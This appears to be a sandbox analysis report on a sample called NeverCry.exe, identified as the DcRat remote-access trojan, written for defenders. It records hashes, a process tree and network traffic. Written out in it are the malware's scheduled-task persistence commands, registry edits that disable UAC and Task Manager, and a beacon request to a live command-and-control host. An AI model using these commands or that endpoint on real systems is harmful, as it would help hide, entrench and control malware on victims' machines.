Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Resubmissions
15/06/2024, 10:59 UTC
240615-m3p8es1hnj 10Analysis
-
max time kernel
44s -
max time network
51s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
15/06/2024, 10:59 UTC
Behavioral task
behavioral1
Sample
NeverCry.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
NeverCry.exe
Resource
win10v2004-20240611-en
General
-
Target
NeverCry.exe
-
Size
1.6MB
-
MD5
7d90121240d8da918d6370c81f6649f7
-
SHA1
d3e344ce25305e9168790f462698d9cbc90b23d3
-
SHA256
689100d4db441ae245b7b6edc85cb739c15ab3a972653483c122ba174032b2db
-
SHA512
d9675eba8aacf2d876400d9d4e22ae4f2af666ee1b72aa21a36b5f7e1518111ccf434e6a5cc08ae3f52fce4855b7baf90037614e358b2df392a2e20f3db9a319
-
SSDEEP
24576:P2G/nvxW3WY0eWu+KIrnB46Yz5R6jIdQX4FcixLckFcBtcuuGzdxX7p1W0ppwl+b:PbA3cnjB4xZi0NGtcuzdV7pLrA+GkeMB
Malware Config
Signatures
-
DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
-
Process spawned unexpected child process 18 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2380 2460 schtasks.exe 33 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2492 2460 schtasks.exe 33 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2920 2460 schtasks.exe 33 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1432 2460 schtasks.exe 33 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2536 2460 schtasks.exe 33 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2748 2460 schtasks.exe 33 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2788 2460 schtasks.exe 33 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1736 2460 schtasks.exe 33 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 844 2460 schtasks.exe 33 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1296 2460 schtasks.exe 33 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2008 2460 schtasks.exe 33 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1452 2460 schtasks.exe 33 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2328 2460 schtasks.exe 33 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1436 2460 schtasks.exe 33 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1920 2460 schtasks.exe 33 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1072 2460 schtasks.exe 33 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1032 2460 schtasks.exe 33 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1028 2460 schtasks.exe 33 -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" ProviderDrivercommon.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" ProviderDrivercommon.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" ProviderDrivercommon.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" wininit.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" wininit.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" wininit.exe -
resource yara_rule behavioral1/files/0x0007000000014e5a-9.dat dcrat behavioral1/memory/2840-13-0x0000000000CF0000-0x0000000000E48000-memory.dmp dcrat behavioral1/memory/2308-44-0x0000000000B30000-0x0000000000C88000-memory.dmp dcrat -
Disables Task Manager via registry modification
-
Executes dropped EXE 2 IoCs
pid Process 2840 ProviderDrivercommon.exe 2308 wininit.exe -
Loads dropped DLL 2 IoCs
pid Process 2644 cmd.exe 2644 cmd.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" wininit.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA ProviderDrivercommon.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" ProviderDrivercommon.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA wininit.exe -
Drops file in Program Files directory 2 IoCs
description ioc Process File created C:\Program Files\DVD Maker\es-ES\sppsvc.exe ProviderDrivercommon.exe File created C:\Program Files\DVD Maker\es-ES\0a1fd5f707cd16 ProviderDrivercommon.exe -
Drops file in Windows directory 2 IoCs
description ioc Process File created C:\Windows\Registration\CRMLog\csrss.exe ProviderDrivercommon.exe File created C:\Windows\Registration\CRMLog\886983d96e3d3e ProviderDrivercommon.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 18 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1072 schtasks.exe 2380 schtasks.exe 2492 schtasks.exe 1432 schtasks.exe 2748 schtasks.exe 2788 schtasks.exe 1736 schtasks.exe 2536 schtasks.exe 1920 schtasks.exe 2008 schtasks.exe 1452 schtasks.exe 1032 schtasks.exe 2920 schtasks.exe 844 schtasks.exe 1296 schtasks.exe 2328 schtasks.exe 1436 schtasks.exe 1028 schtasks.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 2800 reg.exe -
Suspicious behavior: EnumeratesProcesses 8 IoCs
pid Process 2840 ProviderDrivercommon.exe 2840 ProviderDrivercommon.exe 2840 ProviderDrivercommon.exe 2840 ProviderDrivercommon.exe 2840 ProviderDrivercommon.exe 2308 wininit.exe 1300 chrome.exe 1300 chrome.exe -
Suspicious use of AdjustPrivilegeToken 12 IoCs
description pid Process Token: SeDebugPrivilege 2840 ProviderDrivercommon.exe Token: SeDebugPrivilege 2308 wininit.exe Token: SeShutdownPrivilege 1300 chrome.exe Token: SeShutdownPrivilege 1300 chrome.exe Token: SeShutdownPrivilege 1300 chrome.exe Token: SeShutdownPrivilege 1300 chrome.exe Token: SeShutdownPrivilege 1300 chrome.exe Token: SeShutdownPrivilege 1300 chrome.exe Token: SeShutdownPrivilege 1300 chrome.exe Token: SeShutdownPrivilege 1300 chrome.exe Token: SeShutdownPrivilege 1300 chrome.exe Token: SeShutdownPrivilege 1300 chrome.exe -
Suspicious use of FindShellTrayWindow 34 IoCs
pid Process 1300 chrome.exe 1300 chrome.exe 1300 chrome.exe 1300 chrome.exe 1300 chrome.exe 1300 chrome.exe 1300 chrome.exe 1300 chrome.exe 1300 chrome.exe 1300 chrome.exe 1300 chrome.exe 1300 chrome.exe 1300 chrome.exe 1300 chrome.exe 1300 chrome.exe 1300 chrome.exe 1300 chrome.exe 1300 chrome.exe 1300 chrome.exe 1300 chrome.exe 1300 chrome.exe 1300 chrome.exe 1300 chrome.exe 1300 chrome.exe 1300 chrome.exe 1300 chrome.exe 1300 chrome.exe 1300 chrome.exe 1300 chrome.exe 1300 chrome.exe 1300 chrome.exe 1300 chrome.exe 1300 chrome.exe 1300 chrome.exe -
Suspicious use of SendNotifyMessage 32 IoCs
pid Process 1300 chrome.exe 1300 chrome.exe 1300 chrome.exe 1300 chrome.exe 1300 chrome.exe 1300 chrome.exe 1300 chrome.exe 1300 chrome.exe 1300 chrome.exe 1300 chrome.exe 1300 chrome.exe 1300 chrome.exe 1300 chrome.exe 1300 chrome.exe 1300 chrome.exe 1300 chrome.exe 1300 chrome.exe 1300 chrome.exe 1300 chrome.exe 1300 chrome.exe 1300 chrome.exe 1300 chrome.exe 1300 chrome.exe 1300 chrome.exe 1300 chrome.exe 1300 chrome.exe 1300 chrome.exe 1300 chrome.exe 1300 chrome.exe 1300 chrome.exe 1300 chrome.exe 1300 chrome.exe -
Suspicious use of SetWindowsHookEx 4 IoCs
pid Process 1708 xpsrchvw.exe 1708 xpsrchvw.exe 1708 xpsrchvw.exe 1708 xpsrchvw.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2936 wrote to memory of 2156 2936 NeverCry.exe 28 PID 2936 wrote to memory of 2156 2936 NeverCry.exe 28 PID 2936 wrote to memory of 2156 2936 NeverCry.exe 28 PID 2936 wrote to memory of 2156 2936 NeverCry.exe 28 PID 2156 wrote to memory of 2644 2156 WScript.exe 30 PID 2156 wrote to memory of 2644 2156 WScript.exe 30 PID 2156 wrote to memory of 2644 2156 WScript.exe 30 PID 2156 wrote to memory of 2644 2156 WScript.exe 30 PID 2644 wrote to memory of 2840 2644 cmd.exe 32 PID 2644 wrote to memory of 2840 2644 cmd.exe 32 PID 2644 wrote to memory of 2840 2644 cmd.exe 32 PID 2644 wrote to memory of 2840 2644 cmd.exe 32 PID 2840 wrote to memory of 2132 2840 ProviderDrivercommon.exe 52 PID 2840 wrote to memory of 2132 2840 ProviderDrivercommon.exe 52 PID 2840 wrote to memory of 2132 2840 ProviderDrivercommon.exe 52 PID 2132 wrote to memory of 2128 2132 cmd.exe 54 PID 2132 wrote to memory of 2128 2132 cmd.exe 54 PID 2132 wrote to memory of 2128 2132 cmd.exe 54 PID 2644 wrote to memory of 2800 2644 cmd.exe 55 PID 2644 wrote to memory of 2800 2644 cmd.exe 55 PID 2644 wrote to memory of 2800 2644 cmd.exe 55 PID 2644 wrote to memory of 2800 2644 cmd.exe 55 PID 2132 wrote to memory of 2308 2132 cmd.exe 56 PID 2132 wrote to memory of 2308 2132 cmd.exe 56 PID 2132 wrote to memory of 2308 2132 cmd.exe 56 PID 1300 wrote to memory of 1500 1300 chrome.exe 58 PID 1300 wrote to memory of 1500 1300 chrome.exe 58 PID 1300 wrote to memory of 1500 1300 chrome.exe 58 PID 1300 wrote to memory of 292 1300 chrome.exe 59 PID 1300 wrote to memory of 292 1300 chrome.exe 59 PID 1300 wrote to memory of 292 1300 chrome.exe 59 PID 1300 wrote to memory of 292 1300 chrome.exe 59 PID 1300 wrote to memory of 292 1300 chrome.exe 59 PID 1300 wrote to memory of 292 1300 chrome.exe 59 PID 1300 wrote to memory of 292 1300 chrome.exe 59 PID 1300 wrote to memory of 292 1300 chrome.exe 59 PID 1300 wrote to memory of 292 1300 chrome.exe 59 PID 1300 wrote to memory of 292 1300 chrome.exe 59 PID 1300 wrote to memory of 292 1300 chrome.exe 59 PID 1300 wrote to memory of 292 1300 chrome.exe 59 PID 1300 wrote to memory of 292 1300 chrome.exe 59 PID 1300 wrote to memory of 292 1300 chrome.exe 59 PID 1300 wrote to memory of 292 1300 chrome.exe 59 PID 1300 wrote to memory of 292 1300 chrome.exe 59 PID 1300 wrote to memory of 292 1300 chrome.exe 59 PID 1300 wrote to memory of 292 1300 chrome.exe 59 PID 1300 wrote to memory of 292 1300 chrome.exe 59 PID 1300 wrote to memory of 292 1300 chrome.exe 59 PID 1300 wrote to memory of 292 1300 chrome.exe 59 PID 1300 wrote to memory of 292 1300 chrome.exe 59 PID 1300 wrote to memory of 292 1300 chrome.exe 59 PID 1300 wrote to memory of 292 1300 chrome.exe 59 PID 1300 wrote to memory of 292 1300 chrome.exe 59 PID 1300 wrote to memory of 292 1300 chrome.exe 59 PID 1300 wrote to memory of 292 1300 chrome.exe 59 PID 1300 wrote to memory of 292 1300 chrome.exe 59 PID 1300 wrote to memory of 292 1300 chrome.exe 59 PID 1300 wrote to memory of 292 1300 chrome.exe 59 PID 1300 wrote to memory of 292 1300 chrome.exe 59 PID 1300 wrote to memory of 292 1300 chrome.exe 59 PID 1300 wrote to memory of 292 1300 chrome.exe 59 PID 1300 wrote to memory of 292 1300 chrome.exe 59 PID 1300 wrote to memory of 292 1300 chrome.exe 59 PID 1300 wrote to memory of 292 1300 chrome.exe 59 -
System policy modification 1 TTPs 6 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" wininit.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" wininit.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" wininit.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" ProviderDrivercommon.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" ProviderDrivercommon.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" ProviderDrivercommon.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\NeverCry.exe"C:\Users\Admin\AppData\Local\Temp\NeverCry.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2936 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\bridgeCrtSvc\bu6kJS9oJYsl2T.vbe"2⤵
- Suspicious use of WriteProcessMemory
PID:2156 -
C:\Windows\SysWOW64\cmd.execmd /c ""C:\bridgeCrtSvc\GTiPrhC1SOxhlaDLKOjzQ7laPK17.bat" "3⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2644 -
C:\bridgeCrtSvc\ProviderDrivercommon.exe"C:\bridgeCrtSvc\ProviderDrivercommon.exe"4⤵
- UAC bypass
- Executes dropped EXE
- Checks whether UAC is enabled
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2840 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\3YETYeAKgW.bat"5⤵
- Suspicious use of WriteProcessMemory
PID:2132 -
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:26⤵PID:2128
-
-
C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\wininit.exe"C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\wininit.exe"6⤵
- UAC bypass
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- System policy modification
PID:2308
-
-
-
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f4⤵
- Modifies registry key
PID:2800
-
-
-
-
C:\Windows\System32\xpsrchvw.exe"C:\Windows\System32\xpsrchvw.exe" "C:\Users\Admin\Desktop\WriteExport.xps"1⤵
- Suspicious use of SetWindowsHookEx
PID:1708
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 14 /tr "'C:\Recovery\ed850442-d104-11ee-9c57-c695cbc44580\spoolsv.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2380
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Recovery\ed850442-d104-11ee-9c57-c695cbc44580\spoolsv.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2492
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 6 /tr "'C:\Recovery\ed850442-d104-11ee-9c57-c695cbc44580\spoolsv.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2920
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrssc" /sc MINUTE /mo 5 /tr "'C:\Windows\Registration\CRMLog\csrss.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1432
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Windows\Registration\CRMLog\csrss.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2536
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrssc" /sc MINUTE /mo 10 /tr "'C:\Windows\Registration\CRMLog\csrss.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2748
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "servicess" /sc MINUTE /mo 13 /tr "'C:\MSOCache\All Users\{90140000-0117-0409-0000-0000000FF1CE}-C\services.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2788
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0117-0409-0000-0000000FF1CE}-C\services.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1736
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "servicess" /sc MINUTE /mo 6 /tr "'C:\MSOCache\All Users\{90140000-0117-0409-0000-0000000FF1CE}-C\services.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:844
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "xpsrchvwx" /sc MINUTE /mo 13 /tr "'C:\Users\Admin\Music\xpsrchvw.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1296
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "xpsrchvw" /sc ONLOGON /tr "'C:\Users\Admin\Music\xpsrchvw.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2008
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "xpsrchvwx" /sc MINUTE /mo 7 /tr "'C:\Users\Admin\Music\xpsrchvw.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1452
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wininitw" /sc MINUTE /mo 8 /tr "'C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\wininit.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2328
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\wininit.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1436
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wininitw" /sc MINUTE /mo 8 /tr "'C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\wininit.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1920
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 9 /tr "'C:\Program Files\DVD Maker\es-ES\sppsvc.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1072
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Program Files\DVD Maker\es-ES\sppsvc.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1032
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 9 /tr "'C:\Program Files\DVD Maker\es-ES\sppsvc.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1028
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1300 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef6919758,0x7fef6919768,0x7fef69197782⤵PID:1500
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1140 --field-trial-handle=1376,i,8024051047015227939,6010061973717468502,131072 /prefetch:22⤵PID:292
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1520 --field-trial-handle=1376,i,8024051047015227939,6010061973717468502,131072 /prefetch:82⤵PID:1544
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1644 --field-trial-handle=1376,i,8024051047015227939,6010061973717468502,131072 /prefetch:82⤵PID:1356
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2160 --field-trial-handle=1376,i,8024051047015227939,6010061973717468502,131072 /prefetch:12⤵PID:3060
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2180 --field-trial-handle=1376,i,8024051047015227939,6010061973717468502,131072 /prefetch:12⤵PID:2348
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1484 --field-trial-handle=1376,i,8024051047015227939,6010061973717468502,131072 /prefetch:22⤵PID:2620
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=1428 --field-trial-handle=1376,i,8024051047015227939,6010061973717468502,131072 /prefetch:12⤵PID:2380
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3424 --field-trial-handle=1376,i,8024051047015227939,6010061973717468502,131072 /prefetch:82⤵PID:2228
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3552 --field-trial-handle=1376,i,8024051047015227939,6010061973717468502,131072 /prefetch:82⤵PID:1080
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3624 --field-trial-handle=1376,i,8024051047015227939,6010061973717468502,131072 /prefetch:82⤵PID:2432
-
-
C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\setup.exe"C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\setup.exe" --reenable-autoupdates --system-level2⤵PID:2704
-
C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\setup.exe"C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x154,0x158,0x15c,0x128,0x160,0x13fc37688,0x13fc37698,0x13fc376a83⤵PID:1976
-
-
-
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"1⤵PID:1608
Network
-
Remote address:8.8.8.8:53Requesta0991016.xsph.ruIN AResponsea0991016.xsph.ruIN A141.8.192.58
-
GEThttp://a0991016.xsph.ru/71a7beea.php?1nj4yA2AxXPcVFluw=38Vp9XQBJe3bvToS2oeQkAOGju&9bc5a1f6a836361158b9ca3d39d8a61c=547e80fe3c865e9d7b2aa4cf22753fb7&32e5f15105f51c8e47fbee710b2f7fd1=QOhJDMjRWY1Y2NmNTM1QzM5UGZ3IjNxczY1ETY0UTN0QWM3YGM4cTN&1nj4yA2AxXPcVFluw=38Vp9XQBJe3bvToS2oeQkAOGjuwininit.exeRemote address:141.8.192.58:80RequestGET /71a7beea.php?1nj4yA2AxXPcVFluw=38Vp9XQBJe3bvToS2oeQkAOGju&9bc5a1f6a836361158b9ca3d39d8a61c=547e80fe3c865e9d7b2aa4cf22753fb7&32e5f15105f51c8e47fbee710b2f7fd1=QOhJDMjRWY1Y2NmNTM1QzM5UGZ3IjNxczY1ETY0UTN0QWM3YGM4cTN&1nj4yA2AxXPcVFluw=38Vp9XQBJe3bvToS2oeQkAOGju HTTP/1.1
Accept: */*
Content-Type: text/javascript
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
Host: a0991016.xsph.ru
Connection: Keep-Alive
ResponseHTTP/1.1 403 Forbidden
Date: Sat, 15 Jun 2024 11:00:21 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
-
